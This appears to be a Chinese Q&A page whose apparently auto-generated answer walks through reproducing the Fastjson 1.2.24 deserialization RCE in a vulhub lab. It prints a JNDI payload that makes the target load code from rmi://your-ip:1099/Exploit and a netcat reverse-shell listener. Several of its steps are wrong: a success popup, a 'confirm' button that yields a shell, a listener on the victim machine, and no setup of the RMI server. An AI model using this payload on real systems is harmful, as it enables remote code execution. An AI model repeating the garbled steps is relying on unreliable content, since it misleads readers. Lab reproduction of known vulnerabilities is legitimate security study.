fastjson反序列化漏洞复现vulhub
时间: 2023-10-02 20:11:25 浏览: 134
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
5星 · 资源好评率100%
好的,这是一个比较常见的漏洞,以下是vulhub上的fastjson反序列化漏洞的复现步骤:
1. 下载并启动vulhub:
```
git clone https://github.com/vulhub/vulhub.git
cd vulhub/fastjson/1.2.24_rce/
docker-compose up -d
```
2. 打开浏览器,访问`http://your-ip:8080/`,可以看到一个输入框和一个提交按钮。
3. 在输入框中输入以下内容:
```
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://your-ip:1099/Exploit","autoCommit":true}
```
其中,`your-ip`需要替换为你自己的IP地址。
4. 点击提交按钮,可以看到出现了一个弹窗,表示攻击成功。
5. 在vulhub所在的机器上执行以下命令:
```
nc -lvnp 4444
```
6. 在攻击成功的弹窗中,点击“确认”按钮,即可成功得到一个反弹shell。
以上就是漏洞的复现步骤,需要注意的是,该漏洞具有很大的危害性,攻击者可以通过该漏洞实现远程命令执行,因此需要及时修复。
阅读全文